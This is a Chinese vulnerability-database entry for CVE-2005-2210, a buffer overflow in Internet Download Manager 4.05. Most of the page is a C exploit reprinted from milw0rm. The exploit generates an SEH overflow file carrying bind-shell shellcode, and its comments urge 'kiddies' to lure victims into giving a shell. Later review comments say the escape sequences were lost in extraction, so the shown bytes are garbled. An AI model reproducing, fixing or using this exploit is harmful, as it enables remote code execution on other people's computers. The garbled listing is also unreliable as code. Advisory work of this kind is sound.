InternetDownloadManager URL 缓冲区溢出漏洞

InternetDownloadManager URL 缓冲区溢出漏洞

漏洞ID 1108919 漏洞类型 缓冲区溢出
发布时间 2005-07-06 更新时间 2005-07-11
CVE编号 CVE-2005-2210
CNNVD-ID CNNVD-200507-107
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1091
https://www.securityfocus.com/bid/89035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-107
|漏洞详情
InternetDownloadManager是一款文件下载软件。InternetDownloadManager 4.05版本中存在堆栈溢出漏洞。远程攻击者可通过超长URL，利用此漏洞执行任意代码。
|漏洞EXP
/*

  Title : Internet Download Manager  =< 4.05 universal remote overflow Exploit
  bug analyse and exploit code by : c0d3r "Kaveh Razavi" [email protected]
  my advisory : http://www.ihsteam.com/advisory/download_manager_adv.txt
  
  ************************************************************************
  
  this bug is differnt from what was found in application called altnet
  download manager .
  if you read the code carefully you see that I left thingz for you .
  well if you want to creat an html file linked to evil download offer
  needed thingz are there , but in IE they are not usable cause exploit
  string is bigger that IE input buffer .
  I was analysing this bug and I was thinking about how to code an exploit
  for this issue , then new Mozilla exploit came up ! yea the idea of saving
  the exploit string into a file then copy/paste it to download manager 
  inpute url . there are other ways for sure . kiddies still can have fun
  with this code just as I mentioned with a bit scripting in java or other 
  shits you can link exploit string which will be created in file exploit.txt
  you can have a bad file , anyone using download manager can give a shell !
  hint! : any other folder is being counted , so my suggestion is linking to 
  root webfolder .
  sample usage shown in a 1 minute movie which can be downloaded at :
  http://www.ihsteam.com/download/video/dlm.rar
  
  ************************************************************************

  Exploit method : Structured Exception Handling known as SEH .
  Targets : should work on all win2000 and win xp's even sp2 ,
  Tested : winxp sp 1 and win2000 server sp 4
  compile : ms visual c++ 6 : cl dlm.c
  
  ************************************************************************

  Greetingz :
  
  www.ihsteam.com      LorD and NT , LorD always makes me happy with those
  www.ihssecurity.com  Nasa , berkely , stanford ,... shells :>
  www.exploitdev.com   yeah me and jamie are just started , u r0x jamie ,
  www.metasploit.com   fewer words better ones , great !
  www.class101.org     nice work is being done here ! class I used ur offsets :)
  www.c0d3r.org        my home ,nth here right now but those nice Essence words.
  other Folks and friends not mentioned here .

*/ 


#include <stdio.h>
#include <string.h>
#include <windows.h>
#define exploit "exploit.txt"
#define NOP 0x90
#define size 2519
  
  /*
   * Entry point of the generator quoted on this page. It builds one
   * fixed-size byte string in `buffer` and writes it to the file named by
   * the `exploit` macro ("exploit.txt"). argv[1] selects which 4-byte
   * value is copied into `ppr` (0 -> `winxp`, 1 -> `win2000`).
   *
   * NOTE(review): the string literals below read "x31x31x2E", "n----" and
   * so on; the backslashes of the original escape sequences look like they
   * were lost when this listing was extracted, so the literal bytes shown
   * here are not the bytes the author's source produced. The layout
   * arithmetic in the memcpy() calls is what can be read from this text.
   *
   * Memory-safety defects visible in this block (code left as-is):
   *  - `ppr` is never initialised before strcat() appends to it;
   *  - the payload copy starting at offset 2124 and `buffer[size] = 0`
   *    both write past the end of `buffer`;
   *  - exit() and atoi() are used but <stdlib.h> is not included above;
   *  - fopen()'s result is used without a NULL check.
   */
  int main(int argc,char **argv)
{

/*
char crap1[]=  
"x3Cx48x45x41x44x3E"
"x3Cx6Dx65x74x61x20x68x74x74x70x2Dx65"
"x71x75x69x76x3Dx22x43x6Fx6Ex74x65x6E"
"x74x2Dx54x79x70x65x22x20x63x6Fx6Ex74"
"x65x6Ex74x3Dx22x74x65x78x74x2Fx68x74"
"x6Dx6Cx3Bx20x63x68x61x72x73x65x74x3D"
"x69x73x6Fx2Dx38x38x35x39x2Dx31x22x3E"
"x3Cx6Dx65x74x61x20x68x74x74x70x2Dx65"
"x71x75x69x76x3Dx22x72x65x66x72x65x73"
"x68x22x20x63x6Fx6Ex74x65x6Ex74x3Dx22"
"x33x3Bx20x55x52x4Cx3D";
char crap2[]= "x22x3E";
char crap3[]=
"x3Cx2Fx68x65x61x64x3E"
"x3Cx2Fx42x4Fx44x59x3E"
"x3Cx2Fx48x54x4Dx4Cx3E";
*/
  /* Prefix copied to offset 0 of buffer; the "+3" in the memcpy() offsets
   * below assumes it is 3 bytes long (as the original escapes would give). */
  char crap4[]= "x31x31x2E";


// metasploit shellc0de wow!!! LPORT=4444 Size=399  
     /* Copied with sizeof(shellcode)-1 so the trailing NUL is dropped.
      * The header comment gives the payload as 399 bytes. */
     unsigned char shellcode[] =
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
    FILE *fp;                 // output stream; never checked for NULL below
    char buffer[size];        // size == 2519, so valid indices are 0..2518
    unsigned int os;          // target selector parsed from argv[1]
    char ppr[5];              // uninitialised: strcat() below scans it for a NUL it was never given (UB)
    char jmp[] = "xEBx0Cx90x90";        // 4 bytes placed at offset 2080
    char winxp[] = "xB1x2CxC2x77";      // 4-byte value for target 0
    char win2000[] ="x08xB0x01x78";     // 4-byte value for target 1
    if(argc < 2) {
    printf("n-------- Download Manager remote exploitn");
    printf("-------- copyrighted by c0d3r of IHS 2005n");
    printf("-------- usage : dlm.exe targetn");
    printf("-------- target 1 : windows xp all service packs all languages : 0n");
    printf("-------- target 2 : windows 2000 all service packs all languages : 1n");
    printf("-------- eg : dlm.exe 0n");	
    printf("-------- out file will be exploit.txt for windows xpnn");
    exit(-1) ;                // exit() is not declared by the headers included above; -1 as a status is implementation-dependent
  } 
    // atoi() is likewise undeclared here; non-numeric input yields 0 and
    // silently selects target 0. The unsigned short cast wraps negatives.
    os = (unsigned short)atoi(argv[1]); 	 
    switch(os)
  {
    case 0:
    strcat(ppr,winxp);        // appends to uninitialised ppr (see declaration)
    break;
    case 1:
    strcat(ppr,win2000);      // same issue as case 0
    break;
    default:
    printf("n[-] this target doesnt exist in the listnn");
   
    exit(-1);
  }
   printf("n-------- Download Manager remote exploitn");
   printf("-------- copyrighted by c0d3r of IHS 2005n");
   
    // heart of exploit
   
    printf("-------- building overflow stringn");
    memset(buffer,NOP,size);                 // all 2519 bytes set to NOP (0x90)
    memcpy(buffer,crap4,sizeof(crap4)-1);    // prefix at offset 0 (3 bytes in the original; longer as garbled here)
	memcpy(buffer+3+2077,jmp,4);             // offset 2080
	memcpy(buffer+3+2077+4,ppr,4);           // offset 2084; copies 4 of ppr's 5 bytes
	// offset 2124. With the 399-byte payload named in the header comment,
	// 2124 + 399 = 2523 > size (2519): this write runs 4 bytes past the end
	// of buffer, and the fwrite() below drops those bytes anyway.
	memcpy(buffer+3+2077+4+40,shellcode,sizeof(shellcode)-1);
	buffer[size] = 0;                        // out of bounds: buffer[2519] is one past the end; the terminator is never used
  
	/*
    memcpy(buffer,crap1,sizeof(crap1)-1);
	memcpy(buffer+122,crap4,sizeof(crap4)-1);
    memcpy(buffer+2192,jmp,4);
    memcpy(buffer+2196,ppr,4);
    memcpy(buffer+2200,shellcode,sizeof(shellcode)-1);
    memcpy(buffer+2599,crap2,sizeof(crap2)-1);
    memcpy(buffer+2601,crap3,sizeof(crap3)-1);
    buffer[size] = 0;
    */
	
    // EO heart of exploit  
     
	printf("-------- Done !n");
    printf("-------- Creating the exploit.txt filen");
    fp = fopen(exploit, "w+");               // "w+" is text mode on Windows; a NULL result reaches fwrite()/fclose() unchecked
    fwrite(buffer, sizeof ( unsigned char ), sizeof(buffer), fp);   // writes exactly 2519 bytes; return value ignored
    fclose(fp);                              // return value ignored
    printf("-------- Done ! enjoy it !n");
    return 0;

}

// milw0rm.com [2005-07-06]
|受影响的产品
Tonec Inc. Internet Download Manager 4.05
|参考资料

来源:MISC
链接:http://www.ihsteam.com/download/ihsexpl/dlm.c
来源:SECTRACK
名称:1014404
链接:http://securitytracker.com/id?1014404
